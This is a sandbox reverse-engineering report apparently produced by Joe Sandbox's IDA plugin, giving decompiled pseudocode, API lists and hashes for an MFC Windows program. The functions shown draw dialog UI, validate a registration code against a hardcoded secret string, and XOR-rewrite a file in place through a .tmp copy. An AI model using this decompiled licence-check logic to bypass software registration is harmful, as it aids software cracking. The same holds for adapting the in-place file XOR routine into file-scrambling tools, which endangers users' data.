    				_push( *((intOrPtr*)(_t142 + 0x49c)));
    				L0043E15C();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t142);
    				_push(1);
    				_t72 = L00404F47(_t71, _t142 + 0x31c, _t142);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t142);
    				_push(2);
    				_t73 = L00404F47(_t72, _t142 + 0x2c8, _t142);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t142);
    				_push(0x535e);
    				_t74 = L00404F47(_t73, _t142 + 0x370, _t142);
    				L0043E1C2();
    				_push(0x80);
    				_push(0xe);
    				L0043DD78();
    				_t76 = SendMessageA( *(_t142 + 0x20), 0x80, 0, LoadIconA(_t74, 0x80));
    				L0043E1C2();
    				_push(0x80);
    				_push(0xe);
    				L0043DD78();
    				SendMessageA( *(_t142 + 0x20), 0x80, 1, LoadIconA(_t76, 0x80));
    				E0040CF63(_t142 + 0x174, 0x323232, 1);
    				_t81 = E00429029(_t144 - 0x10, 0xe036);
    				 *(_t144 - 4) = 0;
    				E0040CF2E(_t142 + 0x174, 2,  *_t81, 0, 0, 1, 0, 0);
    				 *(_t144 - 4) =  *(_t144 - 4) | 0xffffffff;
    				L0043DD36();
    				E0040CF63(_t142 + 0x60, 0x323232, 1);
    				_t86 = E00429029(_t144 - 0x10, 0xe026);
    				_t118 = 1;
    				 *(_t144 - 4) = _t118;
    				E0040CF2E(_t142 + 0x60, 5,  *_t86, 0, 0, _t118, 0, 0);
    				 *(_t144 - 4) =  *(_t144 - 4) | 0xffffffff;
    				L0043DD36();
    				_t89 = GetSysColor(0xf);
    				_push("Verdana");
    				 *(_t142 + 0x414) = _t89;
    				 *((intOrPtr*)(_t142 + 0x40c)) = 0x2bc;
    				 *((intOrPtr*)(_t142 + 0x408)) = 0xe;
    				L0043DDD2();
    				_push( *((intOrPtr*)(_t142 + 0x4a0)));
    				L0043DDD2();
    				 *(_t144 - 0x10) = 0;
    				if( *((intOrPtr*)(_t142 + 0x47c)) <= 0) {
    					L5:
    					_t137 =  *((intOrPtr*)(_t142 + 0x4a4));
    					if(_t137 != 0) {
    						_t131 =  *((intOrPtr*)(_t142 + 0x47c));
    						 *(_t144 - 0x10) = 0;
    						if(_t131 <= 0) {
    							L15:
    							_t90 = 1;
    							 *[fs:0x0] =  *((intOrPtr*)(_t144 - 0xc));
    							return _t90;
    						}
    						_t124 =  *((intOrPtr*)(_t142 + 0x478));
    						while(1) {
    							_t91 =  *_t124;
    							if(_t91 != 0 &&  *_t91 == _t137) {
    								break;
    							}
    							 *(_t144 - 0x10) =  *(_t144 - 0x10) + 1;
    							_t124 = _t124 + 4;
    							if( *(_t144 - 0x10) < _t131) {
    								continue;
    							}
    							goto L15;
    						}
    						_t139 =  *(_t144 - 0x10);
    						E0040DA41(_t142, _t139);
    						 *(_t142 + 0x488) = _t139;
    						goto L15;
    					}
    					if(E0040DA41(_t142, 0) != 0) {
    						 *(_t142 + 0x488) = 0;
    					}
    					goto L15;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t140 =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x478)) +  *(_t144 - 0x10) * 4));
    					if(_t140 != 0) {
    						 *(_t144 - 0x48) = E0040D90E(_t142,  *((intOrPtr*)(_t140 + 8)));
    						 *(_t144 - 0x30) =  *(_t144 - 0x30) | 0xffffffff;
    						 *((intOrPtr*)(_t144 - 0x44)) = 0xffff0002;
    						 *((intOrPtr*)(_t144 - 0x2c)) = 0;
    						 *((intOrPtr*)(_t144 - 0x1c)) = _t140;
    						 *((intOrPtr*)(_t144 - 0x40)) = 5;
    						_t98 = SendMessageA( *(_t142 + 0x454), 0x1100, 0, _t144 - 0x48);
    						 *(_t144 - 0x14) = _t98;
    						if(_t98 != 0) {
    							 *(E0040DECC(_t142 + 0x4a8,  *_t140)) =  *(_t144 - 0x14);
    						}
    					}
    					 *(_t144 - 0x10) =  *(_t144 - 0x10) + 1;
    				} while ( *(_t144 - 0x10) <  *((intOrPtr*)(_t142 + 0x47c)));
    				goto L5;
    			}


    0x0040d65b
    0x0040d666
    0x0040d668
    0x0040d687
    0x0040d68d
    0x0040d69a
    0x0040d6a0
    0x0040d6a3
    0x0040d6ad
    0x0040d6b3
    0x0040d6bb
    0x0040d6c0
    0x0040d6c7
    0x0040d6d1
    0x0040d6d2
    0x0040d6d3
    0x0040d6d4
    0x0040d6dc
    0x0040d6e1
    0x0040d6e3
    0x0040d6e8
    0x0040d6e9
    0x0040d6ea
    0x0040d6eb
    0x0040d6f3
    0x0040d6f8
    0x0040d6fa
    0x0040d6ff
    0x0040d700
    0x0040d701
    0x0040d702
    0x0040d70d
    0x0040d712
    0x0040d71c
    0x0040d71d
    0x0040d720
    0x0040d734
    0x0040d73a
    0x0040d73f
    0x0040d740
    0x0040d743
    0x0040d756
    0x0040d76a
    0x0040d778
    0x0040d790
    0x0040d793
    0x0040d798
    0x0040d79f
    0x0040d7aa
    0x0040d7b8
    0x0040d7c3
    0x0040d7c9
    0x0040d7d2
    0x0040d7d7
    0x0040d7de
    0x0040d7e5
    0x0040d7eb
    0x0040d7f6
    0x0040d7fc
    0x0040d806
    0x0040d810
    0x0040d815
    0x0040d821
    0x0040d82c
    0x0040d82f
    0x0040d8a3
    0x0040d8a3
    0x0040d8ab
    0x0040d8c1
    0x0040d8c7
    0x0040d8cc
    0x0040d8fc
    0x0040d901
    0x0040d905
    0x0040d90d
    0x0040d90d
    0x0040d8ce
    0x0040d8d4
    0x0040d8d4
    0x0040d8d8
    0x00000000
    0x00000000
    0x0040d8de
    0x0040d8e1
    0x0040d8e7
    0x00000000
    0x00000000
    0x00000000
    0x0040d8e9
    0x0040d8eb
    0x0040d8f1
    0x0040d8f6
    0x00000000
    0x0040d8f6
    0x0040d8b7
    0x0040d8b9
    0x0040d8b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040d831
    0x0040d831
    0x0040d83a
    0x0040d83f
    0x0040d84b
    0x0040d84e
    0x0040d855
    0x0040d863
    0x0040d86c
    0x0040d86f
    0x0040d876
    0x0040d87e
    0x0040d881
    0x0040d893
    0x0040d893
    0x0040d881
    0x0040d895
    0x0040d89b
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 0040D65B
    • #4710.MFC42 ref: 0040D668
    • GetWindowLongA.USER32 ref: 0040D675
    • SetWindowLongA.USER32 ref: 0040D687
    • GetWindowRect.USER32 ref: 0040D69A
    • #6880.MFC42(?), ref: 0040D6A3
    • InflateRect.USER32(?,000000FE,000000FE), ref: 0040D6AD
    • #6199.MFC42(?), ref: 0040D6BB
    • #1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D712
    • #1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040D720
    • LoadIconA.USER32(00000000,00000080), ref: 0040D726
    • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040D734
    • #1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D73A
    • #1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040D743
    • LoadIconA.USER32(00000000,00000080), ref: 0040D749
    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040D756
      • Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #800.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D79F
    • #800.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D7DE
    • GetSysColor.USER32(0000000F), ref: 0040D7E5
    • #860.MFC42 ref: 0040D810
    • #860.MFC42(?), ref: 0040D821
    • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040D876
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1168LoadMessageRectSendWindow$#1146#800#860IconLong$#4710#537#6199#6880ColorH_prologInflateInvalidateString
    • String ID: 222$Verdana
    • API String ID: 359381756-2915611299
    • Opcode ID: b0662d16579d0ec98cf9fd69a4cca89934458d332b1a3a97f616bf490a4ff534
    • Instruction ID: 11db7a75c21a29c48b88e5a492485a2d3a1a4e4e851043c482f94ed88d9c66cf
    • Opcode Fuzzy Hash: b0662d16579d0ec98cf9fd69a4cca89934458d332b1a3a97f616bf490a4ff534
    • Instruction Fuzzy Hash: 178172B1A00605AFD720AF61CC86FAFB7B9FF85714F10452EF166A62D1CB742945CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 49%
    			E0041ADDB(void* __ecx) {
    				intOrPtr* _t71;
    				intOrPtr* _t73;
    				intOrPtr* _t78;
    				intOrPtr* _t80;
    				void* _t86;
    				void* _t98;
    				void* _t106;
    
    				E0043E4E0(0x4414d0, _t106);
    				_push(0x32);
    				_push(_t106 - 0xb4);
    				_push(0xd6d9);
    				L0043E078();
    				if( *((char*)(_t106 - 0xb4)) != 0) {
    					_t98 = 0xa;
    					_push(_t98);
    					_push(_t106 - 0x4c);
    					_push(0xd6da);
    					L0043E078();
    					_push(_t98);
    					_push(_t106 - 0x28);
    					_push(0xd6db);
    					L0043E078();
    					_push(_t98);
    					_push(_t106 - 0x40);
    					_push(0xd6dc);
    					L0043E078();
    					_push(_t98);
    					_push(_t106 - 0x34);
    					_push(0xd6dd);
    					_t86 = __ecx;
    					L0043E078();
    					lstrcpyA(_t106 - 0x80, _t106 - 0x4c);
    					lstrcatA(_t106 - 0x80, _t106 - 0x28);
    					lstrcatA(_t106 - 0x80, _t106 - 0x40);
    					lstrcatA(_t106 - 0x80, _t106 - 0x34);
    					E0041AD0E(_t86, _t106 - 0xb4, "_r <()<1-Z2[l5,^", _t106 - 0xe8);
    					if(lstrcmpiA(_t106 - 0xe8, _t106 - 0x80) != 0) {
    						_push(0x40);
    						_push("Registration error");
    						_push("Registration code or user name is invalid. Please check all fields and try again!");
    						L0043E2EE();
    						Sleep(0x12c);
    						goto L5;
    					} else {
    						_t71 = E00429029(_t106 - 0x1c, 0xe06c);
    						 *(_t106 - 4) = 2;
    						_t73 = E00429029(_t106 - 0x14, 0xe063);
    						_push(0x40);
    						_push( *_t71);
    						_push( *_t73);
    						 *(_t106 - 4) = 3;
    						L0043E2EE();
    						 *(_t106 - 4) = 2;
    						L0043DD36();
    						 *(_t106 - 4) =  *(_t106 - 4) | 0xffffffff;
    						L0043DD36();
    						_push(_t106 - 0xb4);
    						L0043DDD2();
    						_push(_t106 - 0x80);
    						L0043DDD2();
    						_push(1);
    						_pop(0);
    					}
    				} else {
    					_t78 = E00429029(_t106 - 0x10, 0xe062);
    					 *(_t106 - 4) =  *(_t106 - 4) & 0x00000000;
    					_t80 = E00429029(_t106 - 0x18, 0xe01e);
    					_push(0x40);
    					_push( *_t78);
    					_push( *_t80);
    					 *(_t106 - 4) = 1;
    					L0043E2EE();
    					 *(_t106 - 4) =  *(_t106 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t106 - 4) =  *(_t106 - 4) | 0xffffffff;
    					L0043DD36();
    					L5:
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t106 - 0xc));
    				return 0;
    			}


    0x0041ade0
    0x0041adf3
    0x0041adf5
    0x0041adf8
    0x0041adfd
    0x0041ae09
    0x0041ae63
    0x0041ae66
    0x0041ae67
    0x0041ae68
    0x0041ae6d
    0x0041ae75
    0x0041ae76
    0x0041ae77
    0x0041ae7e
    0x0041ae86
    0x0041ae87
    0x0041ae88
    0x0041ae8f
    0x0041ae97
    0x0041ae98
    0x0041ae99
    0x0041ae9e
    0x0041aea0
    0x0041aead
    0x0041aec1
    0x0041aecb
    0x0041aed5
    0x0041aeea
    0x0041af05
    0x0041af78
    0x0041af7a
    0x0041af7f
    0x0041af86
    0x0041af90
    0x00000000
    0x0041af07
    0x0041af10
    0x0041af20
    0x0041af27
    0x0041af31
    0x0041af33
    0x0041af34
    0x0041af37
    0x0041af3b
    0x0041af43
    0x0041af47
    0x0041af4c
    0x0041af53
    0x0041af61
    0x0041af62
    0x0041af6d
    0x0041af6e
    0x0041af73
    0x0041af75
    0x0041af75
    0x0041ae0b
    0x0041ae14
    0x0041ae1b
    0x0041ae28
    0x0041ae32
    0x0041ae34
    0x0041ae35
    0x0041ae38
    0x0041ae3c
    0x0041ae41
    0x0041ae48
    0x0041ae4d
    0x0041ae54
    0x0041af96
    0x0041af96
    0x0041af9d
    0x0041afa5

    APIs
    • __EH_prolog.LIBCMT ref: 0041ADE0
    • #3098.MFC42(0000D6D9,?,00000032), ref: 0041ADFD
    • #4224.MFC42(?,?,00000040,?,00000032), ref: 0041AE3C
    • #800.MFC42(?,?,00000040,?,00000032), ref: 0041AE48
    • #800.MFC42(?,?,00000040,?,00000032), ref: 0041AE54
    • #3098.MFC42(0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE6D
    • #3098.MFC42(0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE7E
    • #3098.MFC42(0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE8F
    • #3098.MFC42(0000D6DD,?,0000000A,0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AEA0
    • lstrcpyA.KERNEL32(?,?,0000D6DD,?,0000000A,0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?), ref: 0041AEAD
    • lstrcatA.KERNEL32(?,?), ref: 0041AEC1
    • lstrcatA.KERNEL32(?,?), ref: 0041AECB
    • lstrcatA.KERNEL32(?,?), ref: 0041AED5
    • lstrcmpiA.KERNEL32(?,?), ref: 0041AEFD
    • #4224.MFC42(?,74B481D0,00000040), ref: 0041AF3B
    • #800.MFC42(?,74B481D0,00000040), ref: 0041AF47
    • #800.MFC42(?,74B481D0,00000040), ref: 0041AF53
    • #860.MFC42(00000000,?,74B481D0,00000040), ref: 0041AF62
    • #860.MFC42(?,00000000,?,74B481D0,00000040), ref: 0041AF6E
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    Strings
    • Registration code or user name is invalid. Please check all fields and try again!, xrefs: 0041AF7F
    • Registration error, xrefs: 0041AF7A
    • _r <()<1-Z2[l5,^, xrefs: 0041AEE4
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3098$#800$lstrcat$#4224#860$#1168#537H_prologLoadStringlstrcmpilstrcpy
    • String ID: Registration code or user name is invalid. Please check all fields and try again!$Registration error$_r <()<1-Z2[l5,^
    • API String ID: 3333420258-1240730675
    • Opcode ID: 8d2f217ab8c9626e3f1c29d11ae397607f8a1332d05e73de8db5ae784aa09371
    • Instruction ID: a97a94cf76e351288f84a6b7e3f6c8cccd7e804ea28f3b41527378bcaf2da925
    • Opcode Fuzzy Hash: 8d2f217ab8c9626e3f1c29d11ae397607f8a1332d05e73de8db5ae784aa09371
    • Instruction Fuzzy Hash: AE5140B1E01218AADB14EBE5DC46FEE77BCAB49704F00045BF205E71C1DB789A45CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0042A486(void* __edx) {
    				signed int _t63;
    				intOrPtr* _t64;
    				intOrPtr* _t66;
    				void* _t69;
    				signed int _t70;
    				intOrPtr _t71;
    				void* _t74;
    				intOrPtr* _t76;
    				void* _t81;
    				void* _t84;
    				intOrPtr _t85;
    				void* _t107;
    				void* _t110;
    				void* _t112;
    
    				_t107 = __edx;
    				E0043E4E0(0x4431d4, _t112);
    				__imp__CoInitialize(0, _t81);
    				if(E00429112() != 0) {
    					_t84 = _t112 - 0x10;
    					L0043DDD8();
    					__eflags =  *(_t112 + 0x10);
    					 *(_t112 - 4) = 0;
    					if( *(_t112 + 0x10) != 0) {
    						__eflags =  *(_t112 + 0x10) - 1;
    						if(__eflags != 0) {
    							__eflags =  *(_t112 + 0x10) - 2;
    							if( *(_t112 + 0x10) != 2) {
    								_t63 =  *(_t112 + 0x10);
    							} else {
    								_push(_t112 - 0x10);
    								_push( *((intOrPtr*)(_t112 + 8)));
    								_t63 = E00429A65(_t107);
    								goto L8;
    							}
    						} else {
    							_push(_t112 - 0x10);
    							_push( *((intOrPtr*)(_t112 + 8)));
    							_t63 = E00429FDA(_t84, __eflags);
    							goto L8;
    						}
    					} else {
    						_push(_t112 - 0x10);
    						_push( *((intOrPtr*)(_t112 + 8)));
    						_t63 = E004292F3(_t107);
    						L8:
    					}
    					__eflags = _t63;
    					_t64 =  *0x455b54; // 0x0
    					_push(_t64);
    					_t85 =  *_t64;
    					if(_t63 != 0) {
    						 *((intOrPtr*)(_t85 + 8))();
    						_t66 =  *0x455b50; // 0x0
    						 *((intOrPtr*)( *_t66 + 8))(_t66);
    						__imp__CoUninitialize();
    						 *0x455b54 = 0;
    						 *0x455b50 = 0;
    						_t69 = E0042980F(_t112 - 0x14,  *_t66, _t112 - 0x14, "HTML_TEMPLATE", 0x17);
    						_push("</BODY>");
    						 *(_t112 - 4) = 1;
    						L0043DFD6();
    						_push( *((intOrPtr*)(_t112 - 0x10)));
    						_push(_t69);
    						L0043E4C2();
    						L0043E486();
    						 *(_t112 - 4) = 2;
    						L0043DDDE();
    						 *(_t112 - 4) = 3;
    						L0043DDD8();
    						 *(_t112 - 0x1c) =  *(_t112 - 0x1c) | 0xffffffff;
    						_push(0);
    						 *(_t112 - 4) = 4;
    						 *(_t112 - 0x28) = 0x445490;
    						 *((intOrPtr*)(_t112 - 0x20)) = 0;
    						L0043DDD2();
    						_t70 = _t112 - 0x28;
    						_push(_t70);
    						_push(0x1001);
    						_push( *((intOrPtr*)(_t112 + 0xc)));
    						 *(_t112 - 4) = 5;
    						L0043E480();
    						__eflags = _t70;
    						if(_t70 != 0) {
    							_t71 =  *((intOrPtr*)(_t112 - 0x14));
    							_push( *((intOrPtr*)(_t71 - 8)));
    							_push(_t71);
    							L0043E47A();
    							L0043E474();
    							_push(_t112 + 0x10);
    							L0043E276();
    							 *(_t112 - 4) = 7;
    							E0042AAFA( *(_t112 + 0x10));
    							 *(_t112 - 4) = 5;
    							L0043DD36();
    							 *(_t112 - 0x28) = 0x445490;
    							 *(_t112 - 4) = 8;
    							_t110 = 1;
    						} else {
    							 *(_t112 - 0x28) = 0x445490;
    							 *(_t112 - 4) = 6;
    							_t110 = 0;
    						}
    						L0043DD36();
    						 *(_t112 - 0x28) = 0x44547c;
    						 *(_t112 - 4) = 1;
    						L0043E46E();
    						 *(_t112 - 4) = 0;
    						L0043DD36();
    					} else {
    						 *((intOrPtr*)(_t85 + 8))();
    						_t76 =  *0x455b50; // 0x0
    						 *((intOrPtr*)( *_t76 + 8))(_t76);
    						__imp__CoUninitialize();
    						_t110 = 0;
    					}
    					_t56 = _t112 - 4;
    					 *_t56 =  *(_t112 - 4) | 0xffffffff;
    					__eflags =  *_t56;
    					L0043DD36();
    					_t74 = _t110;
    				} else {
    					__imp__CoUninitialize();
    					_t74 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t112 - 0xc));
    				return _t74;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0042A48B
    • CoInitialize.OLE32(00000000), ref: 0042A497
      • Part of subcall function 00429112: CoCreateInstance.OLE32(0044A5A4,00000000,00000001,0044A5C4,?,?,00000001), ref: 00429132
    • CoUninitialize.OLE32(?,?,00000000), ref: 0042A4A6
    • #540.MFC42(?,?,00000000), ref: 0042A4B6
    • CoUninitialize.OLE32(?,?,00000000), ref: 0042A519
    • #800.MFC42(00000002,?,?,?,00001001,?,00000000,00000000,00000002,</BODY>), ref: 0042A64B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Uninitialize$#540#800CreateH_prologInitializeInstance
    • String ID: </BODY>$HTML_TEMPLATE$|TD
    • API String ID: 2735192737-441621316
    • Opcode ID: 574f6f869dd8bebed04467da3fc4568b328b03bd08de2e55b330a5822f44e0c5
    • Instruction ID: f31b22002c98a46963b574554f801982d2b542f9e7fe878eea16abfbd2e59b8e
    • Opcode Fuzzy Hash: 574f6f869dd8bebed04467da3fc4568b328b03bd08de2e55b330a5822f44e0c5
    • Instruction Fuzzy Hash: F951C330D00259EFCF04EFA5D945AEEBB74BF18308F50405EF416A3192DB789A45CB2A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0042A7B1() {
    				void* _t40;
    				void* _t42;
    				CHAR* _t48;
    				void* _t69;
    				void* _t74;
    				int _t77;
    				void* _t80;
    
    				_t40 = E0043E4E0(0x443208, _t80);
    				L0043DDE4();
    				_t77 = 0;
    				 *(_t80 - 4) = 0;
    				L0043DDE4();
    				_t48 =  *(_t80 + 8);
    				_push(0);
    				_push(0x8000);
    				_push(_t48);
    				 *(_t80 - 4) = 1;
    				L0043DDCC();
    				if(_t40 != 0) {
    					L0043E2A6();
    					if(_t40 != 0) {
    						_push(_t48);
    						L0043DE26();
    						_push(".tmp");
    						_push(_t40);
    						_t42 = _t80 - 0x10;
    						 *(_t80 - 4) = 2;
    						_push(_t42);
    						L0043DE20();
    						 *(_t80 - 4) = 4;
    						L0043DD36();
    						_push(0);
    						_push(0xb021);
    						_push( *(_t80 - 0x10));
    						L0043DDCC();
    						if(_t42 != 0) {
    							_push(0x800);
    							L0043DD54();
    							_t74 = _t42;
    							while(1) {
    								_push(0x800);
    								_push(_t74);
    								L0043E29A();
    								if(_t42 == 0) {
    									break;
    								}
    								_t69 = 0;
    								if(_t42 > 0) {
    									do {
    										 *(_t69 + _t74) =  *(_t69 + _t74) ^  *(_t80 + 0xc);
    										_t69 = _t69 + 1;
    									} while (_t69 < _t42);
    								}
    								_push(_t42);
    								_push(_t74);
    								L0043E28E();
    							}
    							L0043E27C();
    							L0043E27C();
    							_push(_t80 + 0xc);
    							L0043E276();
    							 *(_t80 - 4) = 5;
    							E0042AAFA( *(_t80 + 0xc));
    							 *(_t80 - 4) = 4;
    							L0043DD36();
    							_push(_t74);
    							L0043DD42();
    							DeleteFileA(_t48);
    							_t77 = MoveFileA( *(_t80 - 0x10), _t48);
    							 *(_t80 - 4) = 1;
    							L0043DD36();
    						} else {
    							 *(_t80 - 4) = 1;
    							L0043DD36();
    						}
    					}
    				}
    				 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
    				L0043DDC0();
    				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
    				L0043DDC0();
    				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
    				return _t77;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0042A7B6
    • #354.MFC42 ref: 0042A7C3
    • #354.MFC42 ref: 0042A7D0
    • #5186.MFC42(?,00008000,00000000), ref: 0042A7E6
    • #3318.MFC42(?,00008000,00000000), ref: 0042A7F6
    • #537.MFC42(?,?,00008000,00000000), ref: 0042A807
    • #924.MFC42(?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A81A
    • #800.MFC42(?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A826
    • #5186.MFC42(?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A837
    • #800.MFC42(?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A847
    • #823.MFC42(00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A858
    • #5442.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A865
    • #6385.MFC42(00000000,00000000,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A884
    • #1979.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A88E
    • #1979.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A896
    • #3180.MFC42(?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8A2
